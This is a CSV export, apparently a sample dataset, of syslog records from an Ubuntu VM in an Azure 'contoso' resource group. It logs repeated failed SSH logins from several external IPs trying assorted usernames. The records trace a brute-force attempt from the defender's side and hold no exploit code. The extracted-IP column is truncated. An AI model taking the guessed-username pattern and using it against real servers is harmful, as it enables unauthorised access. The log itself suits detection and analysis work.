+1132,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:39:52,UbuntuDevEnv,2019-06-26 18:39:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1133,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:39:54,UbuntuDevEnv,2019-06-26 18:39:53,auth,UbuntuDevEnv,info,Failed password for invalid user whoopsie from 165.227.41.202 port 35290 ssh2,66761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,whoopsie,165.227.41.2,35290,,
+1134,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:39:54,UbuntuDevEnv,2019-06-26 18:39:54,auth,UbuntuDevEnv,info,Disconnected from invalid user whoopsie 165.227.41.202 port 35290 [preauth],66761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,whoopsie,165.227.41.2,35290,,
+1135,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:39:54,UbuntuDevEnv,2019-06-26 18:39:54,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 35290:11: Bye Bye [preauth],66761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,35290,,
+1136,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:40:28,UbuntuDevEnv,2019-06-26 18:40:27,auth,UbuntuDevEnv,info,Invalid user chefdk from 80.108.220.67 port 38038,66874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chefdk,80.108.220.6,38038,,
+1137,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:40:28,UbuntuDevEnv,2019-06-26 18:40:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=80.108.220.67,66874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,80.108.220.6,,0,
+1138,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:40:28,UbuntuDevEnv,2019-06-26 18:40:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1139,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:40:30,UbuntuDevEnv,2019-06-26 18:40:30,auth,UbuntuDevEnv,info,Failed password for invalid user chefdk from 80.108.220.67 port 38038 ssh2,66874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chefdk,80.108.220.6,38038,,
+1140,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:40:30,UbuntuDevEnv,2019-06-26 18:40:30,auth,UbuntuDevEnv,info,Received disconnect from 80.108.220.67 port 38038:11: Bye Bye [preauth],66874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,80.108.220.6,38038,,
+1141,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:40:30,UbuntuDevEnv,2019-06-26 18:40:30,auth,UbuntuDevEnv,info,Disconnected from invalid user chefdk 80.108.220.67 port 38038 [preauth],66874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chefdk,80.108.220.6,38038,,
+1142,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:41:15,UbuntuDevEnv,2019-06-26 18:41:15,auth,UbuntuDevEnv,info,Invalid user haproxy from 107.175.127.237 port 52450,67058,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,haproxy,107.175.127.2,52450,,
+1143,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:41:16,UbuntuDevEnv,2019-06-26 18:41:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67058,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1144,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:41:16,UbuntuDevEnv,2019-06-26 18:41:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,67058,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+1145,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:41:18,UbuntuDevEnv,2019-06-26 18:41:17,auth,UbuntuDevEnv,info,Failed password for invalid user haproxy from 107.175.127.237 port 52450 ssh2,67058,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,haproxy,107.175.127.2,52450,,
+1146,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:41:18,UbuntuDevEnv,2019-06-26 18:41:17,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 52450:11: Bye Bye [preauth],67058,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,52450,,
+1147,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:41:18,UbuntuDevEnv,2019-06-26 18:41:17,auth,UbuntuDevEnv,info,Disconnected from invalid user haproxy 107.175.127.237 port 52450 [preauth],67058,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,haproxy,107.175.127.2,52450,,
+1148,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:41:37,UbuntuDevEnv,2019-06-26 18:41:36,auth,UbuntuDevEnv,info,Invalid user install from 165.227.41.202 port 54280,67126,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,install,165.227.41.2,54280,,
+1149,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:41:37,UbuntuDevEnv,2019-06-26 18:41:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,67126,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
+1150,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:41:37,UbuntuDevEnv,2019-06-26 18:41:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67126,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1151,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:41:38,UbuntuDevEnv,2019-06-26 18:41:38,auth,UbuntuDevEnv,info,Failed password for invalid user install from 165.227.41.202 port 54280 ssh2,67126,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,install,165.227.41.2,54280,,
+1152,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:41:39,UbuntuDevEnv,2019-06-26 18:41:38,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 54280:11: Bye Bye [preauth],67126,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,54280,,
+1153,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:41:39,UbuntuDevEnv,2019-06-26 18:41:38,auth,UbuntuDevEnv,info,Disconnected from invalid user install 165.227.41.202 port 54280 [preauth],67126,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,install,165.227.41.2,54280,,
+1154,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:43:25,UbuntuDevEnv,2019-06-26 18:43:24,auth,UbuntuDevEnv,info,Invalid user vbox from 165.227.41.202 port 45118,67506,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vbox,165.227.41.2,45118,,
+1155,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:43:25,UbuntuDevEnv,2019-06-26 18:43:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67506,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1156,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:43:25,UbuntuDevEnv,2019-06-26 18:43:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,67506,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
+1157,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:43:27,UbuntuDevEnv,2019-06-26 18:43:26,auth,UbuntuDevEnv,info,Invalid user com from 107.175.127.237 port 41402,67513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,com,107.175.127.2,41402,,
+1158,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:43:27,UbuntuDevEnv,2019-06-26 18:43:26,auth,UbuntuDevEnv,info,Failed password for invalid user vbox from 165.227.41.202 port 45118 ssh2,67506,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vbox,165.227.41.2,45118,,
+1159,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:43:27,UbuntuDevEnv,2019-06-26 18:43:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,67513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+1160,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:43:27,UbuntuDevEnv,2019-06-26 18:43:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1161,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:43:27,UbuntuDevEnv,2019-06-26 18:43:27,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 45118:11: Bye Bye [preauth],67506,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,45118,,
+1162,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:43:27,UbuntuDevEnv,2019-06-26 18:43:27,auth,UbuntuDevEnv,info,Disconnected from invalid user vbox 165.227.41.202 port 45118 [preauth],67506,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vbox,165.227.41.2,45118,,
+1163,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:43:30,UbuntuDevEnv,2019-06-26 18:43:29,auth,UbuntuDevEnv,info,Failed password for invalid user com from 107.175.127.237 port 41402 ssh2,67513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,com,107.175.127.2,41402,,
+1164,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:43:30,UbuntuDevEnv,2019-06-26 18:43:29,auth,UbuntuDevEnv,info,Disconnected from invalid user com 107.175.127.237 port 41402 [preauth],67513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,com,107.175.127.2,41402,,
+1165,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:43:30,UbuntuDevEnv,2019-06-26 18:43:29,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 41402:11: Bye Bye [preauth],67513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,41402,,
+1166,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:45:17,UbuntuDevEnv,2019-06-26 18:45:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202  user=irc,67944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,irc,165.227.41.2,,0,
+1167,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:45:19,UbuntuDevEnv,2019-06-26 18:45:19,auth,UbuntuDevEnv,info,Failed password for irc from 165.227.41.202 port 36060 ssh2,67944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,36060,,
+1168,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:45:19,UbuntuDevEnv,2019-06-26 18:45:19,auth,UbuntuDevEnv,info,Disconnected from authenticating user irc 165.227.41.202 port 36060 [preauth],67944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,irc,165.227.41.2,36060,,
+1169,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:45:19,UbuntuDevEnv,2019-06-26 18:45:19,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 36060:11: Bye Bye [preauth],67944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,36060,,
+1170,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:47:09,UbuntuDevEnv,2019-06-26 18:47:08,auth,UbuntuDevEnv,info,Invalid user thierry1129 from 165.227.41.202 port 55188,68390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,thierry1129,165.227.41.2,55188,,
+1171,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:47:09,UbuntuDevEnv,2019-06-26 18:47:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1172,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:47:09,UbuntuDevEnv,2019-06-26 18:47:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,68390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
+1173,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:47:11,UbuntuDevEnv,2019-06-26 18:47:10,auth,UbuntuDevEnv,info,Failed password for invalid user thierry1129 from 165.227.41.202 port 55188 ssh2,68390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,thierry1129,165.227.41.2,55188,,
+1174,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:47:11,UbuntuDevEnv,2019-06-26 18:47:10,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 55188:11: Bye Bye [preauth],68390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,55188,,
+1175,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:47:11,UbuntuDevEnv,2019-06-26 18:47:10,auth,UbuntuDevEnv,info,Disconnected from invalid user thierry1129 165.227.41.202 port 55188 [preauth],68390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,thierry1129,165.227.41.2,55188,,
+1176,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:48:41,UbuntuDevEnv,2019-06-26 18:48:41,auth,UbuntuDevEnv,info,Invalid user angga from 80.108.220.67 port 55710,68696,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,angga,80.108.220.6,55710,,
+1177,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:48:41,UbuntuDevEnv,2019-06-26 18:48:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68696,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1178,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:48:41,UbuntuDevEnv,2019-06-26 18:48:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=80.108.220.67,68696,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,80.108.220.6,,0,
+1179,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:48:43,UbuntuDevEnv,2019-06-26 18:48:43,auth,UbuntuDevEnv,info,Failed password for invalid user angga from 80.108.220.67 port 55710 ssh2,68696,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,angga,80.108.220.6,55710,,
+1180,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:48:43,UbuntuDevEnv,2019-06-26 18:48:43,auth,UbuntuDevEnv,info,Disconnected from invalid user angga 80.108.220.67 port 55710 [preauth],68696,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,angga,80.108.220.6,55710,,
+1181,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:48:43,UbuntuDevEnv,2019-06-26 18:48:43,auth,UbuntuDevEnv,info,Received disconnect from 80.108.220.67 port 55710:11: Bye Bye [preauth],68696,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,80.108.220.6,55710,,
+1182,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:48:57,UbuntuDevEnv,2019-06-26 18:48:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202  user=test,68765,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,165.227.41.2,,0,
+1183,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:49:00,UbuntuDevEnv,2019-06-26 18:48:59,auth,UbuntuDevEnv,info,Failed password for test from 165.227.41.202 port 46028 ssh2,68765,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,46028,,
+1184,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:49:00,UbuntuDevEnv,2019-06-26 18:48:59,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 165.227.41.202 port 46028 [preauth],68765,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,165.227.41.2,46028,,
+1185,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:49:00,UbuntuDevEnv,2019-06-26 18:48:59,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 46028:11: Bye Bye [preauth],68765,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,46028,,
+1186,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:50:44,UbuntuDevEnv,2019-06-26 18:50:43,auth,UbuntuDevEnv,info,Invalid user riakcs from 165.227.41.202 port 36848,69148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,riakcs,165.227.41.2,36848,,
+1187,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:50:44,UbuntuDevEnv,2019-06-26 18:50:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,69148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
+1188,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:50:44,UbuntuDevEnv,2019-06-26 18:50:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1189,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:50:45,UbuntuDevEnv,2019-06-26 18:50:45,auth,UbuntuDevEnv,info,Failed password for invalid user riakcs from 165.227.41.202 port 36848 ssh2,69148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,riakcs,165.227.41.2,36848,,
+1190,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:50:45,UbuntuDevEnv,2019-06-26 18:50:45,auth,UbuntuDevEnv,info,Disconnected from invalid user riakcs 165.227.41.202 port 36848 [preauth],69148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,riakcs,165.227.41.2,36848,,
+1191,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:50:45,UbuntuDevEnv,2019-06-26 18:50:45,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 36848:11: Bye Bye [preauth],69148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,36848,,
